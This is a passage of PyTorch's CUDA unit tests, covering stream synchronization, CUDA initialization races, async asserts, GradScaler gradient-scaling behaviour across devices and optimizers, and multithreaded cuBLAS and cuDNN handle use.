        s1.wait_stream(s0)
        e = c * d

        def clone_leaf_grads():
            stash.append(a.grad.clone())
            stash.append(b.grad.clone())

        # Use a hook on e to install the callback
        e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))

    s2.wait_stream(s1)
    with torch.cuda.stream(s2):
        e.sum().backward()
        # The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
        # If those things happened properly, checking the values of the cloned grads on s2 should be safe:
        self.assertEqual(stash[0], torch.full_like(a, 6))
        self.assertEqual(stash[1], torch.full_like(b, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
    """Two threads racing to initialize CUDA on different devices must not
    deadlock; run in a subprocess so our own CUDA state is untouched."""
    # See https://github.com/pytorch/pytorch/issues/16559
    import subprocess
    subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
    torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
    """torch._assert_async: ambiguous tensors raise immediately on the host,
    truthy scalars pass, and falsy scalars kill the process via a
    device-side assert (checked in subprocesses, since a device-side assert
    poisons the current CUDA context)."""
    with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
        torch._assert_async(torch.tensor([], device="cuda"))
    with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
        torch._assert_async(torch.tensor([0, 0], device="cuda"))

    # Truthy scalars of every kind must pass without raising.
    torch._assert_async(torch.tensor(1, device="cuda"))
    torch._assert_async(torch.tensor(0.1, device="cuda"))
    torch._assert_async(torch.tensor(-0.1, device="cuda"))
    torch._assert_async(torch.tensor(True, device="cuda"))
    torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))

    fail_stmts = [
        "torch._assert_async(torch.tensor(0, device='cuda'))",
        "torch._assert_async(torch.tensor(0.0, device='cuda'))",
        "torch._assert_async(torch.tensor(False, device='cuda'))",
        "torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
    ]

    import subprocess
    for stmt in fail_stmts:
        with self.subTest(stmt=stmt):
            # A falsy scalar triggers a device-side assert -> nonzero exit.
            r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
            self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
    """Exercise torch._amp_foreach_non_finite_check_and_unscale_ and GradScaler._unscale_grads_.

    Verifies that unscaling multiplies grads by inv_scale (4.0 * 0.25 == 1.0
    everywhere), that an inf/nan anywhere in the grad list sets found_inf,
    and that mixed dtypes fall back gracefully while mixed devices raise.
    The "perfect storm" section checks _unscale_grads_ groups grads by
    (device, dtype) and still finds an inf injected into any one of them.
    """
    inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
    found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")

    size = 10
    g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
    ginf = g.clone()
    ginf[2, 2] = float('inf')
    gnan = g.clone()
    gnan[2, 2] = float('nan')

    # Tries selected combinations of
    #  - contiguous grads
    #  - g.clone().t() which is not contiguous but still non overlapping and dense
    #  - variants of g.clone()[:, :5] which are not non overlapping and dense
    # Non overlapping and dense grads route into a multi tensor apply kernel,
    # others use a fallback per-tensor kernel, so we should try both.
    cases = (
        ([g.clone(), g.clone()], False),
        ([g.clone(), g.clone().t()], False),
        ([g.clone(), g.clone()[:, :5]], False),
        ([g.clone()[:, :5], g.clone()[:, :5]], False),
        ([g.clone(), ginf.clone()], True),
        ([g.clone(), gnan.clone()], True),
        ([g.clone(), ginf.clone()[:, :5]], True),
        ([g.clone(), gnan.clone()[:, :5]], True),
        ([ginf.clone(), g.clone()[:, :5]], True),
        ([ginf.clone()[:, :5], g.clone()[:, :5]], True),
    )

    for grads, has_inf in cases:
        found_inf.zero_()
        torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
        if has_inf:
            self.assertEqual(found_inf, 1.0)
        else:
            self.assertEqual(found_inf, 0.0)
            for grad in grads:
                # 4.0 * inv_scale (0.25) == 1.0 after a clean unscale.
                self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)

    # When passing lists with mismatched dtypes to a raw
    # _amp_foreach_non_finite_check_and_unscale_ call,
    # it's expected to fall back to single-tensor TensorIterator kernel.
    grads = [g.clone(), g.to(dtype=torch.float16)]
    torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
    for grad in grads:
        self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)

    # Passing lists with mismatched devices to a raw
    # _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
    if TEST_MULTIGPU:
        with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
            torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
                                                             found_inf,
                                                             inv_scale)

    # Creates a list of grads with mismatched dtypes and devices, to ensure
    # scaler._unscale_grads_ organizes grads by dtype and device before calling
    # _amp_foreach_non_finite_check_and_unscale_ on each set.
    # If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
    def perfect_storm_grads(inject_inf):
        grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
        if TEST_MULTIGPU:
            grads += [g.to(device="cuda:1"),
                      g.to(device="cuda:1")[:, :5],
                      g.to(device="cuda:1", dtype=torch.float16),
                      g.to(device="cuda:1", dtype=torch.float16)]
        if inject_inf >= 0:
            grads[inject_inf][2, 2] = float('inf')
        return grads

    scaler = torch.cuda.amp.GradScaler()
    dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
    dummy_opt = torch.optim.SGD(dummy_params, lr=1.)

    # Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
    # inject_inf == -1 is the clean-run control.
    for inject_inf in range(-1, len(dummy_params)):
        found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
        grads = perfect_storm_grads(inject_inf)
        for i, p in enumerate(dummy_params):
            p.grad = grads[i]
        found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
        if inject_inf < 0:
            # No inf was injected, ensures unscaling worked normally.
            self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
            for grad in grads:
                self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
        else:
            # inf was injected, ensures inf was found.
            self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
    """torch._amp_update_scale_: grow after `growth_interval` clean steps, back off on inf.

    With growth_interval=2, two clean iterations multiply the scale by
    `growth` once; a subsequent skipped (found_inf=1) iteration multiplies
    it by `backoff` and resets the growth tracker.
    """
    growth = 2.0
    backoff = 0.25
    growth_interval = 2
    scale = torch.full((1,), 4.0, dtype=dtype, device=device)
    growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
    # Fix: allocate found_inf on the requested `device` (was hard-coded
    # "cuda:0"), so the test honors its device parameter consistently.
    found_inf = torch.full((1,), 0.0, dtype=torch.float, device=device)

    # Simulates 2 consecutive unskipped iterations
    torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
    self.assertEqual(growth_tracker, 1)
    self.assertEqual(scale, 4.0)  # only one of the two required clean steps so far
    torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
    self.assertEqual(growth_tracker, 0)
    self.assertEqual(scale, 8.0)  # 4.0 * growth

    # Simulates a skipped iteration
    found_inf.fill_(1.0)
    torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
    self.assertEqual(growth_tracker, 0)
    self.assertEqual(scale, 2.0)  # 8.0 * backoff
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
    """GradScaler._unscale_grads_ on sparse grads: unscale values and flag inf/nan.

    Also checks that an fp16 sparse grad whose *coalesced* sum overflows is
    reported as inf even though each uncoalesced value is finite.
    """
    scaler = torch.cuda.amp.GradScaler()

    inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
    found_inf = torch.empty((1,), dtype=dtype, device=device)
    cur = found_inf.device

    # As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
    # https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
    # The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
    # Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
    # legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
    i = torch.tensor([[0, 1, 1],
                      [2, 0, 2]], device="cuda", dtype=torch.int64)
    v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
    s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)

    p = s.clone()
    assert p.is_sparse
    opt = torch.optim.SGD([p], lr=1.)

    # Clean grad: unscaling divides the values by 4 and finds no inf.
    p.grad = s.clone()
    found_inf.zero_()
    found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
    self.assertEqual(found_inf, 0.0)
    self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())

    # An explicit inf among the sparse values must be detected.
    v = torch.FloatTensor([16., 32., float('inf')])
    p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
    found_inf.zero_()
    found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
    self.assertEqual(found_inf, 1.0)

    # Same for nan.
    v = torch.FloatTensor([16., 32., float('nan')])
    p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
    found_inf.zero_()
    found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
    self.assertEqual(found_inf, 1.0)

    # Repeat the clean case with an fp16 param (allow_fp16=True).
    p = s.clone().half()
    assert p.is_sparse
    opt = torch.optim.SGD([p], lr=1.)

    p.grad = s.clone().half()
    found_inf.zero_()
    found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
    self.assertEqual(found_inf, 0.0)
    self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())

    # Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
    # does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
    # _amp_non_finite_check_and_unscale_ should report an overflow here.
    i = torch.LongTensor([[0, 1, 0],
                          [2, 0, 2]])
    v = torch.FloatTensor([64000., 32., 64000.])
    p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
    found_inf.zero_()
    found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
    self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
    """Distinct torch.device objects naming the same device must act as one dict key.

    GradScaler keys per-device state on torch.device instances; if equal
    devices hashed differently, it would fail in a way that's difficult to
    detect (a silent performance hit).
    """
    device_map = {}
    t = torch.empty((1,), device="cuda:0")
    dev0_first = torch.device("cuda:0")
    dev0_second = torch.device("cuda:0")
    dev1_first = torch.device("cuda:1")
    dev1_second = torch.device("cuda:1")

    self.assertTrue(hash(dev0_first) == hash(dev0_second))
    self.assertTrue(hash(dev1_first) == hash(dev1_second))

    # Two equal cuda:0 keys collapse to a single entry; last write wins.
    device_map[dev0_first] = "0a"
    device_map[dev0_second] = "0b"
    self.assertTrue(len(device_map) == 1)
    self.assertTrue(device_map[dev0_first] == "0b")

    # A device object taken from a live tensor matches the same entry.
    device_map[t.device] = "t"
    self.assertTrue(len(device_map) == 1)
    self.assertTrue(device_map[dev0_first] == "t")

    # cuda:1 is a distinct key from cuda:0 but collapses with itself.
    device_map[dev1_first] = "1a"
    device_map[dev1_second] = "1b"
    self.assertTrue(len(device_map) == 2)
    self.assertTrue(device_map[dev1_first] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
    """scaler.scale() must recurse through nested containers of tensors on multiple devices."""
    scaler = torch.cuda.amp.GradScaler(init_scale=2.)
    t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
    t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
    # Nested iterables of tensors spread across both devices.
    outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
    outputs = scaler.scale(outputs)
    # Every leaf tensor should have been multiplied by the scale: 4.0 * 2.0 == 8.0.
    scaled_leaves = [outputs[0], outputs[1][0], outputs[1][1],
                     outputs[2][0], outputs[2][1][0], outputs[2][1][1]]
    self.assertTrue(all(leaf == 8.0 for leaf in scaled_leaves))
    # The scale tensor should live on the device of the first tensor scaled (t1's).
    self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
    """load_state_dict copies scale/growth/backoff settings and resets the growth tracker."""
    for lazy_init_scale in (True, False):
        src = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
        dst = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
        # Junk value that load_state_dict is expected to overwrite.
        dst._init_growth_tracker = 7

        if lazy_init_scale:
            # A dummy scale() call forces lazy creation of the scale tensor.
            dst.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
            self.assertTrue(isinstance(dst._scale, torch.cuda.FloatTensor))

        dst.load_state_dict(src.state_dict())

        self.assertEqual(dst.get_scale(), 3.)
        self.assertEqual(dst.get_growth_factor(), 4.)
        self.assertEqual(dst.get_backoff_factor(), .5)
        self.assertEqual(dst.get_growth_interval(), 2)
        self.assertEqual(dst._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
    """Build two weight-identical Linear->Linear models, each with its own SGD optimizer.

    One pair is the scaling-enabled subject, the other an unscaled control,
    so test results can be compared parameter-by-parameter.
    """
    mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
    mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
    # Start both models from exactly the same weights.
    for control_param, scaling_param in zip(mod_control.parameters(), mod_scaling.parameters()):
        scaling_param.data.copy_(control_param.data)

    opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
    opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)

    return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
    """Return (mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter)."""
    # Four (input, target) batches of random 8x8 data.
    data = [(torch.randn((8, 8), dtype=dtype, device=device),
             torch.randn((8, 8), dtype=dtype, device=device))
            for _ in range(4)]

    loss_fn = torch.nn.MSELoss().cuda()
    skip_iter = 2  # iteration on which tests inject an inf gradient

    return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
    """Drive `run` once without and once with the scaling API, then compare results.

    Args:
        run: callable(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api)
            that trains and may return a replacement scaler instance.
        unskipped: number of iterations expected to grow the scale.
        skipped: number of iterations expected to back the scale off.
        atol: tolerance for the final parameter comparison.
    """
    # Ensure scaling can be disabled without changing user control flow.
    for enabled in True, False:
        mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()

        # For functionality, test with a modest initial scale, and an unrealistically-large growth factor
        # so any potential errors with the growth factor handling will be magnified.
        scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)

        _ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
        ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)

        # Allows run() to optionally return a different scaler instance.
        scaler = ret if ret else scaler

        # If scaling was enabled, the scale factor should have been multiplied by the growth factor
        # len(data) - skipped times and the backoff factor "skipped" times.
        if enabled:
            net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
            net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
            self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
        else:
            self.assertTrue(scaler.get_scale() == 1.0)

        for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
            self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
    """End-to-end GradScaler + autocast run versus an unscaled fp32 control run.

    The second _run_scaling_case call sets try_pickle, which makes run()
    round-trip the scaler through pickle after each step — the restored
    scaler must keep working (run() returns it so the helper can inspect it).
    """
    try_pickle = False

    def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
        for i, (input, target) in enumerate(data):
            optimizer.zero_grad()
            with torch.autocast('cuda', enabled=try_scaling_api):
                output = model(input)
                loss = loss_fn(output, target)
            if try_scaling_api:
                scaler.scale(loss).backward()
                # Inject an inf on the designated iteration so the scaler skips the step.
                if i == skip_iter and scaler.is_enabled():
                    model[1].weight.grad.data.fill_(float('inf'))
                scaler.step(optimizer)
                scaler.update()
                if try_pickle:
                    scaler = pickle.loads(pickle.dumps(scaler))
            else:
                loss.backward()
                if (not scaler.is_enabled()) or (i != skip_iter):
                    optimizer.step()
        return scaler

    # sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
    self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
    # this will be picked up by try_pickle within run():
    try_pickle = True
    self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
    """Gradient clipping applied to still-scaled grads: threshold is scaled by get_scale()."""
    def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
        max_norm = 0.2  # A reasonable value that actually has an effect, based on printouts of grads
        for i, (input, target) in enumerate(data):
            optimizer.zero_grad()
            output = model(input)
            loss = loss_fn(output, target)
            if try_scaling_api:
                scaler.scale(loss).backward()
                # Grads are still scaled here, so scale the clip threshold to match.
                torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
                if i == skip_iter and scaler.is_enabled():
                    model[1].weight.grad.data.fill_(float('inf'))
                scaler.step(optimizer)
                scaler.update()
            else:
                loss.backward()
                torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
                if (not scaler.is_enabled()) or (i != skip_iter):
                    optimizer.step()

    self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
    """Gradient clipping after an explicit scaler.unscale_(): threshold needs no scale correction."""
    def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
        max_norm = 0.2  # A reasonable value that actually has an effect, based on printouts of grads
        for i, (input, target) in enumerate(data):
            optimizer.zero_grad()
            output = model(input)
            loss = loss_fn(output, target)
            if try_scaling_api:
                scaler.scale(loss).backward()
                if i == skip_iter and scaler.is_enabled():
                    model[1].weight.grad.data.fill_(float('inf'))
                scaler.unscale_(optimizer)
                # error_if_nonfinite=False: the injected inf is expected and handled by the scaler.
                torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
                scaler.step(optimizer)
                scaler.update()
            else:
                loss.backward()
                torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
                if (not scaler.is_enabled()) or (i != skip_iter):
                    optimizer.step()

    self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
    """Gradient-penalty pattern (double backward through autograd.grad) under GradScaler."""
    def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
        for i, (input, target) in enumerate(data):
            optimizer.zero_grad()
            output = model(input)
            loss = loss_fn(output, target)

            if try_scaling_api:
                grad_params = torch.autograd.grad(scaler.scale(loss),
                                                  model.parameters(), create_graph=True)
                # Manually unscale the intermediate grads before forming the penalty term.
                inv_scale = 1. / scaler.get_scale()
                grad_params = [p * inv_scale for p in grad_params]
            else:
                grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)

            # Penalty: L2 norm of all parameter grads, added to the loss.
            grad_norm = 0
            for grad in grad_params:
                grad_norm += grad.pow(2).sum()
            grad_norm = grad_norm.sqrt()
            loss = loss + grad_norm

            if try_scaling_api:
                scaler.scale(loss).backward()
                if i == skip_iter and scaler.is_enabled():
                    model[1].weight.grad.data.fill_(float('inf'))
                scaler.step(optimizer)
                scaler.update()
            else:
                loss.backward()
                if (not scaler.is_enabled()) or (i != skip_iter):
                    optimizer.step()

    self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
    """Gradient accumulation: step/update only every iters_to_accumulate iterations."""
    def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
        iters_to_accumulate = 2
        for i, (input, target) in enumerate(data):
            output = model(input)
            loss = loss_fn(output, target)
            # Average the loss over the accumulation window.
            loss = loss / iters_to_accumulate
            if try_scaling_api:
                scaler.scale(loss).backward()
            else:
                loss.backward()
            if (i + 1) % iters_to_accumulate == 0:
                if try_scaling_api:
                    scaler.step(optimizer)
                    scaler.update()
                    optimizer.zero_grad()
                else:
                    optimizer.step()
                    optimizer.zero_grad()

    # 4 batches / 2 accumulation steps -> 2 optimizer steps, none skipped.
    self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
    """One GradScaler driving 2 models and 2 optimizers fed by 2 interacting losses."""
    # Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
    # Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
    for enabled in True, False:
        mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
            self._create_scaling_case()
        mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
            self._create_scaling_models_optimizers()

        scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)

        def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
            for i, (input, target) in enumerate(data):
                optimizer0.zero_grad()
                optimizer1.zero_grad()
                output0 = model0(input)
                output1 = model1(input)
                # Both losses mix both models' outputs, so each optimizer sees grads from both losses.
                loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
                loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)

                if try_scaling_api:
                    scaler.scale(loss0).backward(retain_graph=True)
                    scaler.scale(loss1).backward()
                    if i == skip_iter and scaler.is_enabled():
                        model1[1].weight.grad.data.fill_(float('inf'))

                    # As an additional stress test, separately unscale for one of the optimizers.
                    scaler.unscale_(optimizer0)

                    scaler.step(optimizer0)
                    scaler.step(optimizer1)
                    scaler.update()
                else:
                    loss0.backward(retain_graph=True)
                    loss1.backward()
                    optimizer0.step()
                    if (not scaler.is_enabled()) or (i != skip_iter):
                        optimizer1.step()

        run(mod_control0, mod_control1, opt_control0, opt_control1, False)
        run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)

        # The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
        self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
                                               scaler.get_backoff_factor()**1) if enabled else 1.0)

        for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
                        chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
            self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
    # Same as above, but runs some of the models on device 1.
    # GradScaler should transparently handle losses and gradients on multiple devices.
    # This test could be combined with the test above, but I think it makes sense to treat
    # multi-GPU operations separately.
    dev0 = torch.device("cuda:0")
    dev1 = torch.device("cuda:1")

    for enabled in True, False:
        mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
            self._create_scaling_case()
        mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
            self._create_scaling_models_optimizers(device=dev1)

        scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)

        def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
            for i, (input, target) in enumerate(data):
                optimizer0.zero_grad()
                optimizer1.zero_grad()
                output0 = model0(input)
                output1 = model1(input.to(dev1))
                # Cross-device losses: each loss mixes outputs living on both GPUs.
                loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
                loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))

                if try_scaling_api:
                    scaler.scale(loss0).backward(retain_graph=True)
                    scaler.scale(loss1).backward()
                    if i == skip_iter and scaler.is_enabled():
                        model1[1].weight.grad.data.fill_(float('inf'))

                    # As an additional stress test, separately unscale for one of the optimizers.
                    scaler.unscale_(optimizer0)

                    scaler.step(optimizer0)
                    scaler.step(optimizer1)

                    # Make sure the found_infs were collected properly across optimizers and devices.
                    if scaler.is_enabled():
                        self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
                        self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
                        self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
                        self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
                                        float(i == skip_iter))

                    scaler.update()
                else:
                    loss0.backward(retain_graph=True)
                    loss1.backward()
                    optimizer0.step()
                    if (not scaler.is_enabled()) or (i != skip_iter):
                        optimizer1.step()

        run(mod_control0, mod_control1, opt_control0, opt_control1, False)
        run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)

        # The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
        self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
                                               scaler.get_backoff_factor()**1) if enabled else 1.0)

        # Copy mod_control1 and mod_scaling1 back to device 0 for comparison
        mod_control1.to(dev0)
        mod_scaling1.to(dev0)

        for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
                        chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
            self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
    """Stress per-thread cuBLAS handles: concurrent gemms on one device must not corrupt results.

    Each thread repeatedly computes results[t] = mm(results[t], weight) / size
    on its own stream; with a shared handle a gemm could land on another
    thread's stream and race with the following div_.
    """
    # Note, these parameters should be very carefully tuned
    # Too small number makes it hard for the racing condition
    # to happen, while too large number sometimes cause hang
    size = 1024
    num_threads = 2
    trials = 3
    test_iters = 100

    weight = torch.ones((size, size), device='cuda')
    results = {}
    barrier = threading.Barrier(num_threads)

    def _worker(t):
        my_stream = torch.cuda.Stream()
        # Hard sync so we don't need to worry about creating and using tensors
        # across streams or the fact that default streams are thread-local.
        # Those issues are not the target of this test.
        torch.cuda.synchronize()
        # Line up threads to increase likelihood of race conditions.
        barrier.wait()
        with torch.cuda.stream(my_stream):
            for i in range(test_iters):
                # If all threads are sharing the same cublas handle,
                # the following sequence may occur:
                # thread 0 calls cublasSetStream()
                # thread 1 calls cublasSetStream()
                # thread 0 launches its raw gemm, which it thinks is in
                #          its own stream, but is actually in thread 1's stream.
                # thread 0 enqueues its div_, which IS in its own stream,
                #          but actually now races with its gemm.
                results[t] = torch.mm(results[t], weight)
                results[t].div_(float(size))
        torch.cuda.synchronize()

    for _ in range(trials):
        for t in range(num_threads):
            results[t] = torch.ones((size, size), device='cuda')

        threads = [threading.Thread(target=_worker,
                                    args=(t,)) for t in range(num_threads)]

        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        # mm then div by size leaves an all-ones matrix, so the sum is size*size.
        for t in range(num_threads):
            self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
    # This function is intended to test the lazy creation and reuse of per-thread
    # cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
    # Failure here likely indicates something wrong with that logic.
    weight = torch.ones((1, 1, 2, 2), device='cuda')

    results = {}

    num_threads = 2
    trials = 3
    test_iters = 1000
    barrier = threading.Barrier(num_threads)

    with torch.backends.cudnn.flags(enabled=True):
        def _worker(t):
            my_stream = torch.cuda.Stream()
            # Hard sync so we don't need to worry about creating and using tensors
            # across streams or the fact that default streams are thread-local.
            # Those issues are not the target of this test.
            torch.cuda.synchronize()
            # Line up threads to increase likelihood of race conditions.
            barrier.wait()
            with torch.cuda.stream(my_stream):
                for _ in range(test_iters):
                    # If all threads are sharing the same cudnn handle,
                    # the following sequence may occur:
                    # thread 0 calls setCuDNNStreamToCurrent()
                    # thread 1 calls setCuDNNStreamToCurrent()
                    # thread 0 launches its raw convolution, which it thinks is in
                    #          its own stream, but is actually in thread 1's stream.
